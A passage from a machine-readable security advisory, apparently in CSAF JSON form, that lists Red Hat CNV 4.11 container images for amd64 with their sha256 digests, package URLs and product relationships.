"pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator&tag=v4.11.0-29", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.11.0-17", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product: { name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product_id: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product_id: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product_id: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product_id: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.11.0-16", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product_id: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product_id: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product_identification_helper: { purl: "pkg:oci/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup&tag=v4.11.0-67", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", }, product_reference: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", }, product_reference: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: 